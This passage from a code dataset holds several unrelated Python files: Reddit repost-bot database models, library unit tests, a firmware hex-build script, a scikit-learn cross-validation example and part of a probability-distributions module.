comment_left_at = Column(DateTime, default=func.utc_timestamp())\n    source = Column(String(20), nullable=False)\n    comment_id = Column(String(20), nullable=False)\n    subreddit = Column(String(100), nullable=False)\n    karma = Column(Integer)\n    active = Column(Boolean, default=True)\n    needs_review = Column(Boolean, default=False)\n\nclass BotPrivateMessage(Base):\n    __tablename__ = 'reddit_bot_private_message'\n\n    id = Column(Integer, primary_key=True)\n    subject = Column(String(200), nullable=False)\n    body = Column(String(1000), nullable=False)\n    in_response_to_comment = Column(String(20))\n    in_response_to_post = Column(String(100))\n    recipient = Column(String(150), nullable=False)\n    
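# presumably records which bot action generated this message\n    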
triggered_from = Column(String(50), nullable=False)\n message_sent_at = Column(DateTime, default=func.utc_timestamp())\n\n\nclass Comment(Base):\n __tablename__ = 'reddit_comments'\n\n id = Column(Integer, primary_key=True)\n comment_id = Column(String(100), nullable=False, unique=True)\n body = Column(Text(collation='utf8mb4_general_ci'))\n ingested_at = Column(DateTime, default=func.utc_timestamp())\n\nclass RepostWatch(Base):\n __tablename__ = 'reddit_repost_watch'\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n user = Column(String(100), nullable=False)\n created_at = Column(DateTime, default=func.utc_timestamp())\n last_detection = Column(DateTime)\n same_sub = Column(Boolean, default=False, nullable=False)\n expire_after = Column(Integer)\n enabled = Column(Boolean, default=True)\n source = Column(String(100))\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'enabled': self.enabled,\n 'post_id': self.post_id,\n 'user': self.user,\n 'created_at': self.created_at.timestamp(),\n 'last_detection': self.last_detection.timestamp() if self.last_detection else None,\n 'expire_after': self.expire_after,\n 'source': self.source\n }\n\nclass ImageRepost(Base):\n\n __tablename__ = 'image_reposts'\n __table_args__ = (\n Index('Index 3', 'repost_of', unique=False),\n Index('idx_author', 'author', unique=False),\n Index('idx_detected_at', 'detected_at', unique=False),\n Index('idx_repost_of_date', 'detected_at', 'author', unique=False)\n )\n id = Column(Integer, primary_key=True)\n hamming_distance = Column(Integer)\n annoy_distance = Column(Float)\n post_id = Column(String(100), nullable=False)\n repost_of = Column(String(100), nullable=False)\n detected_at = Column(DateTime, default=func.utc_timestamp())\n author = Column(String(100))\n subreddit = Column(String(100), nullable=False)\n source = Column(String(100))\n search_id = Column(Integer)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'hamming_distance': self.hamming_distance,\n 'post_id': self.post_id,\n 'repost_of': self.repost_of,\n 'detected_at': self.detected_at.timestamp() if self.detected_at else None,\n 'author': self.author,\n 'subreddit': self.subreddit,\n 'source': self.source,\n 'search_id': self.search_id\n }\n\nclass LinkRepost(Base):\n\n __tablename__ = 'link_reposts'\n __table_args__ = (\n Index('Index 3', 'repost_of', unique=False),\n Index('idx_author', 'author', unique=False),\n Index('idx_detected_at', 'detected_at', unique=False),\n Index('idx_repost_of_date', 'detected_at', 'author', unique=False)\n )\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n repost_of = Column(String(100), nullable=False)\n detected_at = Column(DateTime, default=func.utc_timestamp())\n author = Column(String(100))\n subreddit = Column(String(100), nullable=False)\n source = Column(String(100))\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'repost_of': self.repost_of,\n 'detected_at': self.detected_at.timestamp() if self.detected_at else None,\n 'author': self.author,\n 'subreddit': self.subreddit,\n 'source': self.source,\n }\n\nclass VideoHash(Base):\n __tablename__ = 'reddit_video_hashes'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n created_at = Column(DateTime, default=func.utc_timestamp())\n hashes = Column(String(1300))\n length = Column(Integer)\n\nclass AudioFingerPrint(Base):\n __tablename__ = 'audio_fingerprints'\n id = Column(Integer, 
primary_key=True)\n post_id = Column(String(100), nullable=False)\n hash = Column(String(30), nullable=False)\n offset = Column(Integer, nullable=False)\n created_at = Column(DateTime, default=func.utc_timestamp())\n\nclass IndexBuildTimes(Base):\n __tablename__ = 'index_build_times'\n id = Column(Integer, primary_key=True)\n index_type = Column(String(50), nullable=False)\n hostname = Column(String(200), nullable=False)\n items = Column(Integer, nullable=False)\n build_start = Column(DateTime, nullable=False)\n build_end = Column(DateTime, nullable=False)\n build_minutes = Column(Integer)\n\nclass MonitoredSub(Base):\n __tablename__ = 'reddit_monitored_sub'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(200), nullable=False, unique=True)\n active = Column(Boolean, default=False)\n repost_only = Column(Boolean, default=True)\n report_submission = Column(Boolean, default=False)\n report_msg = Column(String(200), default='RepostSleuthBot-Repost')\n requestor = Column(String(150))\n added_at = Column(DateTime, default=func.utc_timestamp())\n target_hamming = Column(Integer)\n target_annoy = Column(Float)\n target_days_old = Column(Integer)\n same_sub_only = Column(Boolean, default=False)\n notes = Column(String(500))\n filter_crossposts = Column(Boolean, default=True)\n filter_same_author = Column(Boolean, default=True)\n sticky_comment = Column(Boolean, default=False)\n remove_repost = Column(Boolean, default=False)\n removal_reason = Column(String(200))\n lock_post = Column(Boolean, default=False)\n mark_as_oc = Column(Boolean, default=False)\n repost_response_template = Column(String(2000))\n oc_response_template = Column(String(2000))\n meme_filter = Column(Boolean, default=False)\n title_ignore_keywords = Column(String(200))\n disable_summons_after_auto_response = Column(Boolean, default=False)\n disable_bot_summons = Column(Boolean, default=False)\n only_allow_one_summons = Column(Boolean, default=False)\n remove_additional_summons = Column(Boolean, default=False)\n check_all_submissions = Column(Boolean, default=True)\n check_title_similarity = Column(Boolean, default=False)\n target_title_match = Column(Integer)\n subscribers = Column(Integer, default=0)\n is_mod = Column(Boolean, default=False)\n post_permission = Column(Boolean, default=False)\n wiki_permission = Column(Boolean, default=False)\n wiki_managed = Column(Boolean, default=True)\n check_image_posts = Column(Boolean, default=True)\n check_link_posts = Column(Boolean, default=False)\n check_text_posts = Column(Boolean, default=False)\n check_video_posts = Column(Boolean, default=False)\n target_image_match = Column(Integer, default=92)\n target_image_meme_match = Column(Integer, default=97)\n meme_filter_check_text = Column(Boolean, default=False)\n meme_filter_text_target_match = Column(Integer, default=90)\n only_comment_on_repost = Column(Boolean, default=True)\n report_reposts = Column(Boolean, default=False)\n failed_admin_check_count = Column(Integer, default=0)\n activation_notification_sent = Column(Boolean, default=False)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'active': self.active,\n 'repost_only': self.repost_only,\n 'report_submission': self.report_submission,\n 'report_msg': self.report_msg,\n 'requestor': self.requestor,\n 'added_at': str(self.added_at),\n 'target_hamming': self.target_hamming,\n 'target_annoy': self.target_annoy,\n 'target_days_old': self.target_days_old,\n 'same_sub_only': self.same_sub_only,\n 'filter_crossposts': 
self.filter_crossposts,\n 'filter_same_author': self.filter_same_author,\n 'remove_repost': self.remove_repost,\n 'removal_reason': self.removal_reason,\n 'lock_post': self.lock_post,\n 'mark_as_oc': self.mark_as_oc,\n 'title_ignore_keywords': self.title_ignore_keywords,\n 'disable_summons_after_auto_response': self.disable_summons_after_auto_response,\n 'disable_bot_summons': self.disable_bot_summons,\n 'only_allow_one_summons': self.only_allow_one_summons,\n 'remove_additional_summons': self.remove_additional_summons,\n 'check_all_submissions': self.check_all_submissions,\n 'check_title_similarity': self.check_title_similarity,\n 'target_title_match': self.target_title_match,\n 'notes': self.notes,\n 'sticky_comment': self.sticky_comment,\n 'repost_response_template': self.repost_response_template,\n 'oc_response_template': self.oc_response_template,\n 'meme_filter': self.meme_filter,\n 'wiki_managed': self.wiki_managed,\n 'check_image_posts': self.check_image_posts,\n 'check_link_posts': self.check_link_posts,\n 'check_video_posts': self.check_video_posts,\n 'check_text_posts': self.check_text_posts,\n 'target_image_match': self.target_image_match,\n 'target_image_meme_match': self.target_image_meme_match,\n 'meme_filter_check_text': self.meme_filter_check_text,\n 'meme_filter_text_target_match': self.meme_filter_text_target_match,\n 'subscribers': self.subscribers,\n 'is_mod': self.is_mod,\n 'wiki_permission': self.wiki_permission,\n 'post_permission': self.post_permission,\n 'only_comment_on_repost': self.only_comment_on_repost,\n 'report_reposts': self.report_reposts,\n 'failed_admin_check_count': self.failed_admin_check_count\n\n }\n\n\n\nclass MonitoredSubChecks(Base):\n __tablename__ = 'reddit_monitored_sub_checked'\n __table_args__ = (\n Index('post_id', 'post_id'),\n )\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n checked_at = Column(DateTime, default=func.utc_timestamp())\n subreddit = Column(String(100))\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'checked_at': self.checked_at.timestamp(),\n 'subreddit': self.subreddit\n }\n\nclass MonitoredSubConfigRevision(Base):\n __tablename__ = 'reddit_monitored_sub_config_revision'\n id = Column(Integer, primary_key=True)\n revision_id = Column(String(36), nullable=False, unique=True)\n revised_by = Column(String(100), nullable=False)\n config = Column(String(1000), nullable=False)\n config_loaded_at = Column(DateTime)\n is_valid = Column(Boolean, default=False)\n notified = Column(Boolean, default=False)\n subreddit = Column(String(100), nullable=False)\n\n\nclass MemeTemplate(Base):\n __tablename__ = 'meme_template'\n id = Column(Integer, primary_key=True)\n dhash_h = Column(String(64))\n dhash_256 = Column(String(256))\n post_id = Column(String(100), nullable=False, unique=True)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'dhash_h': self.dhash_h,\n 'dhash_256': self.dhash_256,\n 'post_id': self.post_id\n }\n\nclass InvestigatePost(Base):\n __tablename__ = 'investigate_post'\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n matches = Column(Integer)\n found_at = Column(DateTime, default=func.utc_timestamp())\n url = Column(String(2000, collation='utf8mb4_general_ci'), nullable=False)\n flag_reason = Column(String(20))\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'matches': self.matches,\n 'found_at': str(self.found_at),\n 'shortlink': 
f'https://redd.it/{self.post_id}',\n 'url': self.url,\n 'flag_reason': self.flag_reason\n }\n\nclass ImageSearch(Base):\n __tablename__ = 'reddit_image_search'\n __table_args__ = (\n Index('subsearched', 'subreddit', 'source', 'matches_found', unique=False),\n Index('Index 2', 'post_id', unique=False),\n Index('idx_source', 'source', unique=False),\n )\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n source = Column(String(50), nullable=False)\n used_historical_index = Column(Boolean, nullable=False)\n used_current_index = Column(Boolean, nullable=False)\n target_hamming_distance = Column(Integer, nullable=False)\n target_annoy_distance = Column(Float, nullable=False)\n same_sub = Column(Boolean, nullable=False)\n max_days_old = Column(Integer)\n filter_dead_matches = Column(Boolean, nullable=False)\n only_older_matches = Column(Boolean, nullable=False)\n meme_filter = Column(Boolean, nullable=False)\n target_title_match = Column(Integer, nullable=True)\n meme_template_used = Column(Integer)\n search_time = Column(Float, nullable=False)\n index_search_time = Column(Float)\n total_filter_time = Column(Float)\n matches_found = Column(Integer, nullable=False)\n searched_at = Column(DateTime, default=func.utc_timestamp(), nullable=True)\n search_results = Column(Text(75000, collation='utf8mb4_general_ci'))\n subreddit = Column(String(100), nullable=False)\n target_image_match = Column(Integer, default=92)\n target_image_meme_match = Column(Integer, default=97)\n\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'source': self.source,\n 'target_hamming_distance': self.target_hamming_distance,\n 'used_historical_index': self.used_historical_index,\n 'used_current_index': self.used_current_index,\n 'same_sub': self.same_sub,\n 'max_days_old': self.max_days_old,\n 'filter_dead_matches': self.filter_dead_matches,\n 'only_older_matches': self.only_older_matches,\n 'meme_filter': self.meme_filter,\n 'meme_template_used': self.meme_template_used,\n 'search_time': self.search_time,\n 'index_search_time': self.index_search_time,\n 'total_filter_time': self.total_filter_time,\n 'searched_at': self.searched_at.timestamp(),\n 'matches_found': self.matches_found,\n 'subreddit': self.subreddit,\n 'target_image_match': self.target_image_match,\n 'target_image_meme_match': self.target_image_meme_match\n }\n\nclass UserReport(Base):\n __tablename__ = 'reddit_user_report'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n reported_by = Column(String(100), nullable=False)\n post_type = Column(String(15))\n report_type= Column(String(25), nullable=False)\n meme_template = Column(Integer)\n reported_at = Column(DateTime, default=func.utc_timestamp())\n msg_body = Column(String(1000))\n message_id = Column(String(20), nullable=False)\n sent_for_voting = Column(Boolean, default=False)\n\nclass ToBeDeleted(Base):\n __tablename__ = 'to_be_deleted'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n post_type = Column(String(20))\n\nclass BannedSubreddit(Base):\n __tablename__ = 'banned_subreddit'\n id = Column(Integer, primary_key=True)\n subreddit = Column(String(100), nullable=False, unique=True)\n detected_at = Column(DateTime, default=func.utc_timestamp())\n last_checked = Column(DateTime, default=func.utc_timestamp())\n\nclass BannedUser(Base):\n __tablename__ = 'banned_users'\n id = Column(Integer, primary_key=True)\n name = Column(String(100), nullable=False, 
unique=True)\n    reason = Column(String(150), nullable=False)\n    banned_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n    expires_at = Column(DateTime)\n    notes = Column(String(500))\n\nclass StatsGeneral(Base):\n    __tablename__ = 'stats_general'\n    id = Column(Integer, primary_key=True)\n    image_reposts_detected = Column(Integer)\n    link_reposts_detected = Column(Integer)\n    private_messages_sent = Column(Integer)\n    comments_left = Column(Integer)\n    summons_received = Column(Integer)\n    karma_gained = Column(Integer)\n\nclass StatsTopImageRepost(Base):\n    __tablename__ = 'stats_top_image_repost'\n    id = Column(Integer, primary_key=True)\n    post_id = Column(String(100), nullable=False)\n    repost_count = Column(Integer, nullable=False)\n    days = Column(Integer, nullable=False)\n    nsfw = Column(Boolean, nullable=False)\n\n\nclass MonitoredSubConfigChange(Base):\n    __tablename__ = 'reddit_monitored_sub_config_change'\n    __table_args__ = (\n        Index('idx_subreddit', 'subreddit', 'updated_at', unique=False),\n    )\n    id = Column(Integer, primary_key=True)\n    updated_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n    updated_by = Column(String(100), nullable=False)\n    source = Column(String(10))\n    subreddit = Column(String(200), nullable=False)\n    config_key = Column(String(100), nullable=False)\n    old_value = Column(String(2000))\n    new_value = Column(String(2000))\n\nclass ConfigMessageTemplate(Base):\n    __tablename__ = 'config_message_templates'\n    id = Column(Integer, primary_key=True)\n    template_name = Column(String(100), nullable=False, unique=True)\n    template_slug = Column(String(100), nullable=False, unique=True)\n    template = Column(String(2000), nullable=False)\n    created_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n    updated_at = Column(DateTime, default=func.utc_timestamp(), onupdate=func.current_timestamp(), nullable=True)\n\n    def to_dict(self):\n        return {\n            'id': self.id,\n            'template_name': self.template_name,\n            'template': self.template,\n            'template_slug': self.template_slug,\n            'created_at': self.created_at.timestamp() if self.created_at else None,\n            'updated_at': self.updated_at.timestamp() if self.updated_at else None\n        }\n\nclass ConfigSettings(Base):\n    __tablename__ = 'config_settings'\n    id = Column(Integer, primary_key=True)\n    comment_karma_flag_threshold = Column(Integer)\n    comment_karma_remove_threshold = Column(Integer)\n    index_api = Column(String(150))\n    util_api = Column(String(150))\n    top_post_offer_watch = Column(Boolean, default=False)\n    repost_watch_enabled = Column(Boolean)\n    ingest_repost_check_image = Column(Boolean)\n    ingest_repost_check_link = Column(Boolean)\n    ingest_repost_check_text = Column(Boolean)\n    ingest_repost_check_video = Column(Boolean)\n    image_repost_target_image_match = Column(Integer)\n    image_repost_target_image_meme_match = Column(Integer)\n    image_repost_target_annoy_distance = Column(Float)\n\nclass SiteAdmin(Base):\n    __tablename__ = 'site_admin'\n    id = Column(Integer, primary_key=True)\n    user = Column(String(100), nullable=False, unique=True)\n    super_user = Column(Boolean, default=False)\n    created_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n    updated_at = Column(DateTime, default=func.utc_timestamp(), onupdate=func.current_timestamp(), nullable=True)\n\n    def to_dict(self):\n        return {\n            'id': self.id,\n            'user': self.user,\n            'super_user': self.super_user,\n            'created_at': self.created_at.timestamp() if self.created_at else None,\n            'updated_at': self.updated_at.timestamp() if self.updated_at 
else None\n }\n\n\nclass MemeTemplatePotential(Base):\n __tablename__ = 'meme_template_potential'\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n submitted_by = Column(String(100), nullable=False)\n created_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n vote_total = Column(Integer, nullable=False, default=0)\n\n votes = relationship('MemeTemplatePotentialVote', back_populates='potential_template', cascade=\"all, delete\")\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'submitted_by': self.submitted_by,\n 'vote_total': self.vote_total,\n 'created_at': self.created_at.timestamp() if self.created_at else None,\n 'votes': [vote.to_dict() for vote in self.votes]\n }\n\nclass MemeTemplatePotentialVote(Base):\n __tablename__ = 'meme_template_potential_votes'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=False)\n meme_template_potential_id = Column(Integer, ForeignKey('meme_template_potential.id'))\n user = Column(String(100), nullable=False)\n vote = Column(Integer, nullable=False)\n voted_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n\n potential_template = relationship(\"MemeTemplatePotential\", back_populates='votes')\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'user': self.user,\n 'vote': self.vote,\n 'voted_at': self.voted_at.timestamp() if self.voted_at else None,\n }","sub_path":"redditrepostsleuth/core/db/databasemodels.py","file_name":"databasemodels.py","file_ext":"py","file_size_in_byte":26315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"380618874","text":"import unittest\nfrom pathlib import Path\nfrom rdflib import Literal, URIRef\n\n\nfrom pysbolgraph.terms import SBOL2\nfrom pysbolgraph.SBOL2Graph import SBOL2Graph as Graph\nfrom pysbolgraph.S2Identified import S2Identified\n\n\nclass TestIdentified(unittest.TestCase):\n\n def setUp(self):\n testfile = Path(__file__).parent.parent / \"SBOLTestSuite/SBOL2/pAGM1467.xml\"\n self.graph = Graph()\n self.graph.load(str(testfile))\n self.thing = S2Identified(self.graph, \"http://www.async.ece.utah.edu/pAGM1467\")\n\n def test_getproperty_succeeds(self):\n self.assertEqual(self.thing[SBOL2.displayId], Literal(\"pAGM1467\"))\n\n def test_getproperty_fails_keyerror(self):\n with self.assertRaises(KeyError):\n self.thing[\"nonexistent\"]\n\n def test_getproperty_fails_typerror(self):\n with self.assertRaises(TypeError):\n self.thing[12345]\n\n def test_setproperty_succeeds(self):\n before = self.thing[SBOL2.displayId]\n expected = Literal(\"adisplayid\")\n self.assertNotEqual(expected, before)\n self.thing[SBOL2.displayId] = expected\n after = self.thing[SBOL2.displayId]\n self.assertEqual(expected, after)\n\n\n","sub_path":"test/test_identified.py","file_name":"test_identified.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"595269617","text":"import sys\nimport shutil \nimport fileinput\nimport os\nimport glob\n \ndef deleteHexFiles():\n fileList = glob.glob('./hap2.5.1*/hap2.5.1*.hex', recursive=True)\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n print(\"Error while deleting file : \", filePath)\n\ndef deleteFiles():\n print(os.getcwd())\n fileList = glob.glob('../2.5.11/hamcp2515_*.c')\n fileList.extend(glob.glob('../2.5.11/mv*.h'))\n 
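# hamcp2515_*.c, mv*.h and haam*.h are the per-build sources that copyFiles() places here\n    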
fileList.extend(glob.glob('../2.5.11/haam*.h'))\n    for filePath in fileList:\n        try:\n            os.remove(filePath)\n        except:\n            print(\"Error while deleting file : \", filePath)\n\ndef buildHexFile():\n    os.system(\"make clean\")\n    os.system(\"make all\")\n\ndef copyFiles(mv,hamcp2515,haam):\n    os.chdir(\"../2.5.11/\")\n    print(os.getcwd()) \n    shutil.copy(os.path.join(os.getcwd(),\"files\",mv), os.getcwd())\n    shutil.copy(os.path.join(os.getcwd(),\"files\",hamcp2515), os.getcwd())\n    shutil.copy(os.path.join(os.getcwd(),\"files\",haam), os.getcwd())\n\ndef concatFlashAndBootloader():\n    for j in range(1,5):\n        \n        for k in range(1,5):\n\n            if k == 1:\n                desFolder = \"hap2.5.1\" + str(j) + \"_WithDimmer_WithoutSerial\"\n            elif k == 2:\n                desFolder = \"hap2.5.1\" + str(j) + \"_WithDimmer_WithSerial\"\n            elif k == 3:\n                desFolder = \"hap2.5.1\" + str(j) + \"_WithoutDimmer_WithoutSerial\"\n            else:\n                desFolder = \"hap2.5.1\" + str(j) + \"_WithoutDimmer_WithSerial\"\n\n            for l in range(4,6):\n                for i in range(15):\n                    id = hex(int(i))[2:].zfill(1)\n\n                    f1 = open(desFolder + \"/haEOF.hex\")\n                    f1_contents = f1.read()\n                    f1.close()\n\n                    f2 = open(\"Bootloader/HAPBootLoader-2893\" + str(l) + id + \".hex\")\n                    f2_contents = f2.read()\n                    f2.close()\n\n                    f3 = open(desFolder + \"/\" + desFolder + \"BootLoader-2893\" + str(l) + id + \".hex\", \"w\") # open in `w` mode to write\n                    f3.write(f1_contents + f2_contents) # concatenate the contents\n                    f3.close()\n\n#deleteHexFiles()\n\n\ndeleteFiles()\ncopyFiles(\"mv.h\",\"hamcp2515_10kBit.c\",\"haam.h\")\n#buildHexFile()\ndeleteFiles()\n\n#concatFlashAndBootloader()\n\n","sub_path":"firmware/Precompiled_old/BuildHexFiles.py","file_name":"BuildHexFiles.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"359107581","text":"import pytest\n\nfrom great_expectations.core.configuration import AbstractConfig\nfrom great_expectations.data_context.store.store import Store\n\n\n@pytest.mark.unit\ndef test_ge_cloud_response_json_to_object_dict() -> None:\n    store = Store()\n    data = {\"foo\": \"bar\", \"baz\": \"qux\"}\n    assert store.ge_cloud_response_json_to_object_dict(response_json=data) == data\n\n\n@pytest.mark.unit\ndef test_store_name_property_and_defaults() -> None:\n    store = Store()\n    assert store.store_name == \"no_store_name\"\n\n\n@pytest.mark.unit\ndef test_store_serialize() -> None:\n    store = Store()\n    value = AbstractConfig(id=\"abc123\", name=\"my_config\")\n    assert store.serialize(value) == value\n\n\n@pytest.mark.unit\ndef test_store_deserialize() -> None:\n    store = Store()\n    value = {\"a\": \"b\"}\n    assert store.deserialize(value) == value\n","sub_path":"tests/data_context/store/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"125126847","text":"# This section computes the accuracy of each cross-validation fold and the mean accuracy.\n__author__ = \"ALEX-CHUN-YU (P76064538@mail.ncku.edu.tw)\"\nfrom sklearn import datasets\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\n\n# Load the Iris flower dataset (four attributes)\niris = datasets.load_iris()\niris_X = iris.data\niris_y = iris.target\n# Use the K Nearest Neighbors algorithm (classification)\nknn = KNeighborsClassifier(n_neighbors = 5)\n# Scores computed through cross validation, with the data split into 4 folds\nscores = cross_val_score(knn, iris_X, iris_y, cv = 4, scoring='accuracy')\nprint(\"Accuracy For Each 
Test:\")\nprint(scores)\nprint(\"Accuracy:\")\nprint(scores.mean())\n","sub_path":"model_evaluation/sklearn_cross_validation_2.py","file_name":"sklearn_cross_validation_2.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"72411810","text":"\"\"\"\nDistributions\n---------\nModule description\n\"\"\"\nfrom abc import ABC, abstractmethod\nfrom collections.abc import Iterable\nimport copy\n\nimport numpy as np\nfrom scipy.special import binom\n\nimport torch\nfrom torch import distributions\n\nfrom brancher.utilities import broadcast_and_squeeze_mixed\nfrom brancher.utilities import broadcast_parent_values\nfrom brancher.utilities import sum_data_dimensions\nfrom brancher.utilities import is_discrete, is_tensor\nfrom brancher.utilities import tensor_range\n\nfrom brancher.config import device\n\n#TODO: We need asserts checking for the right parameters\n\nclass Distribution(ABC):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n pass\n\n def check_parameters(self, **parameters):\n assert all([any([param in parameters for param in parameters_tuple]) if isinstance(parameters_tuple, tuple) else parameters_tuple in parameters\n for parameters_tuple in self.required_parameters])\n\n @abstractmethod\n def _calculate_log_probability(self, x, **parameters):\n pass\n\n @abstractmethod\n def _get_sample(self, **parameters):\n pass\n\n @abstractmethod\n def _preprocess_parameters_for_log_prob(self, x, **parameters):\n pass\n\n @abstractmethod\n def _preprocess_parameters_for_sampling(self, **parameters):\n pass\n\n @abstractmethod\n def _postprocess_sample(self, sample, shape):\n pass\n\n @abstractmethod\n def _postprocess_log_prob(self, log_prob, number_samples, number_datapoints):\n pass\n\n def calculate_log_probability(self, x, **parameters):\n self.check_parameters(**parameters)\n x, parameters, number_samples, number_datapoints = self._preprocess_parameters_for_log_prob(x, **parameters)\n log_prob = self._calculate_log_probability(x, **parameters)\n log_prob = self._postprocess_log_prob(log_prob, number_samples, number_datapoints)\n return sum_data_dimensions(log_prob)\n\n def get_sample(self, **parameters):\n self.check_parameters(**parameters)\n parameters, shape = self._preprocess_parameters_for_sampling(**parameters)\n pre_sample = self._get_sample(**parameters)\n sample = self._postprocess_sample(pre_sample, shape)\n return sample\n\n\nclass ContinuousDistribution(Distribution):\n pass\n\n\nclass DiscreteDistribution(Distribution):\n pass\n\n\nclass UnivariateDistribution(Distribution):\n \"\"\"\n Summary\n \"\"\"\n\n def _preprocess_parameters_for_sampling(self, **parameters):\n parameters = broadcast_and_squeeze_mixed((), parameters)\n return parameters, None\n\n def _preprocess_parameters_for_log_prob(self, x, **parameters):\n tuple_x, parameters = broadcast_and_squeeze_mixed(tuple([x]), parameters)\n return tuple_x[0], parameters, None, None #TODO: add proper output here\n\n def _postprocess_sample(self, sample, shape=None):\n return sample\n\n def _postprocess_log_prob(self, log_prob, number_samples, number_datapoints):\n return log_prob\n\n\nclass ImplicitDistribution(Distribution):\n \"\"\"\n Summary\n \"\"\"\n\n def _preprocess_parameters_for_sampling(self, **parameters):\n return parameters, None\n\n def _preprocess_parameters_for_log_prob(self, x, **parameters):\n return x, parameters, None, None #TODO: add proper output here\n\n def _postprocess_sample(self, sample, shape=None):\n 
return sample\n\n def _calculate_log_probability(self, x, **parameters):\n return torch.tensor(np.zeros((1,1))).float().to(device) #TODO: Implement some checks here\n\n def _postprocess_log_prob(self, log_pro, number_samples, number_datapoints):\n return log_pro\n\n\nclass VectorDistribution(Distribution):\n \"\"\"\n Summary\n \"\"\"\n def _preproces_vector_input(self, vector_input_dict, vector_names):\n shapes_dict = {par_name: list(par_value.shape)\n for par_name, par_value in vector_input_dict.items()\n if par_name in vector_names}\n reshaped_parameters = {par_name: par_value.contiguous().view(size=(shapes_dict[par_name][0], np.prod(\n shapes_dict[par_name][1:]))) if par_name in vector_names else par_value\n for par_name, par_value in vector_input_dict.items()}\n tensor_shape = list(shapes_dict.values())[0][1:]\n return reshaped_parameters, tensor_shape\n\n def _preprocess_parameters_for_sampling(self, **parameters):\n parameters, number_samples, number_datapoints = broadcast_parent_values(parameters)\n reshaped_parameters, tensor_shape = self._preproces_vector_input(parameters, self.vector_parameters)\n shape = tuple([number_samples, number_datapoints] + tensor_shape)\n return reshaped_parameters, shape\n\n def _preprocess_parameters_for_log_prob(self, x, **parameters):\n parameters_and_data = parameters\n parameters_and_data.update({\"x_data\": x})\n parameters_and_data, number_samples, number_datapoints = broadcast_parent_values(parameters_and_data)\n vector_names = self.vector_parameters\n vector_names.add(\"x_data\")\n reshaped_parameters_and_data, _ = self._preproces_vector_input(parameters_and_data, vector_names)\n x = reshaped_parameters_and_data.pop(\"x_data\")\n return x, reshaped_parameters_and_data, number_samples, number_datapoints\n\n def _postprocess_sample(self, sample, shape):\n return sample.contiguous().view(size=shape)\n\n def _postprocess_log_prob(self, log_pro, number_samples, number_datapoints):\n return log_pro.contiguous().view(size=(number_samples, number_datapoints))\n\n\nclass CategoricalDistribution(VectorDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {(\"p\", \"softmax_p\")}\n self.optional_parameters = {}\n self.vector_parameters = {\"p\", \"softmax_p\"}\n self.matrix_parameters = {}\n self.scalar_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n vector_shape = parameters[\"p\"].shape if \"p\" in parameters else parameters[\"softmax_p\"].shape\n if x.shape == vector_shape and tensor_range(x) == {0, 1}:\n dist = distributions.one_hot_categorical.OneHotCategorical\n else:\n dist = distributions.categorical.Categorical\n\n if \"p\" in parameters:\n log_prob = dist(probs=parameters[\"p\"]).log_prob(x[:, 0])\n\n elif \"softmax_p\" in parameters:\n log_prob = dist(logits=parameters[\"softmax_p\"]).log_prob(x[:, 0])\n\n else:\n raise ValueError(\"Either p or \" +\n \"softmax_p needs to be provided as input\")\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"p\" in parameters:\n sample = distributions.one_hot_categorical.OneHotCategorical(probs=parameters[\"p\"]).sample()\n elif \"softmax_p\" in parameters:\n sample = distributions.one_hot_categorical.OneHotCategorical(logits=parameters[\"softmax_p\"]).sample()\n else:\n raise ValueError(\"Either p or \" +\n \"softmax_p needs 
